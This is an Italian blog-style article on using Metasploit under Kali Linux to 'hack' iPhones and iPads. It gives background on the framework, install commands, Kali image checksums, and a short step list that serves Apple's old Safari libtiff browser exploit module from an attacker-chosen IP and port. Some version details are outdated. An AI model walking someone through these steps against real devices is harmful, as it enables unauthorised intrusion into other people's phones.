Mostra tutti

Hack iOS iPhone iPad con Metasploit usando Kali Linux

Come hackerare iOS iPhone iPad con Metasploit usando Kali Linux

Cosa è l’exploit “Metasploit”

Il Metasploit Project è un progetto di sicurezza informatica che fornisce informazioni sulle vulnerabilità, semplifica le operazioni di penetration testing ed aiuta nello sviluppo di sistemi di rilevamento di intrusioni. Il sub-project più conosciuto è Metasploit Framework, uno strumento per lo sviluppo e l’esecuzione di exploit ai danni di una macchina remota. Altri sub-project importanti comprendono l’Opcode Database, l’archivio di shellcode e la ricerca nella sicurezza.

Il Metasploit Project è noto anche per lo sviluppo di strumenti di elusione ed anti-rilevamento, alcuni dei quali sono inclusi in Metasploit Framework.

Metasploit viene creato da HD Moore nel 2003 come strumento portabile di rete basato sul linguaggio di scripting Perl. In un secondo momento, il Metasploit Framework viene completamente riscritto in Ruby. È molto famoso per aver pubblicato alcuni degli exploit più sofisticati. Inoltre, è uno strumento potente: permette ai ricercatori di investigare su alcune potenziali nuove vulnerabilità.

Come alcuni prodotti commerciali ai quali si potrebbe paragonare come CANVAS o Core Security Technologies Core Impact, Metasploit può essere utilizzato dagli amministratori per testare le vulnerabilità dei loro sistemi per poterli così proteggere, oppure dai Black hat e script kiddie per penetrarvi. Come molti strumenti di sicurezza, Metasploit può essere utilizzato per attività legittime e/o illegali.

La posizione guadagnata da Metasploit come un framework di sviluppo di vulnerabilità ha portato, in tempi recenti, alla pubblicazione di advisories spesso accompagnate da un modulo exploit, per il framework, che ne dimostra i rischi ed i passi per risolvere una particolare bug. Metasploit 3.0 (in Ruby) include degli strumenti di fuzzing, per scoprire vulnerabilità software da sé senza dover sviluppare degli exploit per bug pubbliche già note. Queste nuove possibilità si sono aperte grazie all’integrazione del toolset lorcon wireless (802.11) in Metasploit 3.0 nel novembre 2006.

Metasploit Framework

I passaggi fondamentali per l’exploiting di un sistema utilizzando il framework comprendono:

  1. La scelta e la configurazione di un exploit (codice che penetra in un sistema sfruttando una delle falle software dal quale è affetto; sono inclusi quasi 800 differenti exploit (verificato il 26 dicembre 2011) per Windows, Unix/Linux e macOS);
  2. Verificare che un determinato sistema sia soggetto all’azione di un determinato exploit (opzionale);
  3. La scelta e la configurazione di un payload (codice che verrà eseguito dopo un’intrusione avvenuta con successo, ad esempio: una shell remota o un server VNC);
  4. La scelta della tecnica di crittografia per il payload in modo da non essere rilevato dai sistemi anti-intrusione;
  5. L’esecuzione dell’exploit.

Questa modalità che permette di combinare qualsiasi exploit con qualsiasi payload è il maggior vantaggio di Framework: facilita le operazioni di chi attacca e di chi scrive exploit e payload.

L’ultima versione stabile di Metasploit Framework è la 3.5.0 ed è scritta in Ruby. La versione precedente: la 2.7, fu implementata in Perl. Framework è eseguibile su tutte le versione di Unix (inclusi Linux e macOS) e su Windows. Include due linee di comando ed una GUI. Metasploit Framework può essere espanso per l’utilizzo di add-on in diverse lingue.

Per scegliere un exploit ed un payload, vi serviranno maggiori informazioni sul vostro bersaglio: come la versione del sistema operativo e quali servizi di rete sono attualmente installati ed in esecuzione. Queste informazioni sono facilmente reperibili mediante port scanning e strumenti di OS fingerprinting come nmap. Nessus può inoltre scoprire le vulnerabilità di un sistema.

Opcode Database

L’Opcode Database è un’importante risorsa per sviluppatori di nuovi exploit. I Buffer overflow di Windows spesso richiedono conoscenze specifiche di alcuni opcode nel programma che si intende attaccare o nelle sue DLL. Le posizioni degli opcode variano a seconda della versione e della patch, tuttavia sono interamente documentate e facilmente rintracciabili grazie all’Opcode Database. Questo permette di poter scrivere buffer overflow per le diverse versioni di un sistema operativo.

Shellcode Database

Lo Shellcode database contiene i payload utilizzati da Metasploit Framework. Sono scritti in assembly, i sorgenti sono completamente disponibili.

Download ed installazione dell’exploit Metasploit

cd /opt
git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
bash -c ‘for MSF in $(ls msf*); do ln -s /opt/metasploit-framework/$MSF /usr/local/bin/$MSF;done’
bundle install

Hack, iOS, iPhone, iPad, Metasploit, Kali Linux, exploit,

Come usare Metasploit per cercare vulnerabilità su iOS – iPhone ed iPad

  1. Avviare Metasploit (io userò Kali Linux)
  2. una volta avviato il terminale digitare: use exploit/apple_ios/browser/safari_libtiff/
  3. digitare: show options
  4. set URIPATH /
  5. set SRVHOST “NUMERO DI IP DA VERIFICARE” senza virgolette
  6. set SRVPORT 8080
  7. run

Download Kali Linux image

Image Name Download Size Version sha256sum
Kali 64 bit ISO | Torrent 2.9G 2016.2 1d90432e6d5c6f40dfe9589d9d0450a53b0add9a55f71371d601a5d454fa0431
Kali 32 bit ISO | Torrent 2.9G 2016.2 c94772c4fd71f50b245c7b15f4f225ad7c751879f501fa1cf698beb1460c0bf5
Kali 64 bit Light ISO | Torrent 1.1G 2016.2 997f5ed0f7c99c4518288c7e2c4b684b1bdcc2fbe02c152d7ecbd17f0536c29f
Kali 32 bit Light ISO | Torrent 1.1G 2016.2 590e6df2e8e0b4d42bf3dd4e4c7d6acf24b7262fabda52a0c6c3b35006def295
Kali 64 bit e17 ISO | Torrent 2.7G 2016.2 404d0fd917a404cf6c894b5bd87171ebf8eb445bd5573a3e78f88629067d694b
Kali 64 bit Mate ISO | Torrent 2.8G 2016.2 cd11b7085cc7d71546488106c2eedf85386fe73d731bedf38991661270dd91db
Kali 64 bit Xfce ISO | Torrent 2.7G 2016.2 3e08e5420b368183606b105cf2cb1276dd024afe3e2b2e3187d7d37ec1320c41
Kali 64 bit LXDE ISO | Torrent 2.7G 2016.2 7461882843e5a0fc37979850994fb5755249a176429f9e67805bd7f6baa5bb62
Kali armhf Image | Torrent 0.7G 2016.2 f192289b6bc64bab7197a90627ced2477c7c98bd20c1d29f442a152e169dae42
Kali armel Image | Torrent 0.7G 2016.2 efb6f487feab1c9141f28da22c73cbc5217325bf46298f899ac89c39c19aa5f5

Termini di ricerca ricorrenti: hack iphone kali, iphone metasploit, armitage iphone, goliath kali linux. installare kali linux su iphone, hack whatsapp kali linux, kali linux iphone, kali linux bypass icloud, Download Kali Linux image, Kali linux install, 

libro vita da hacker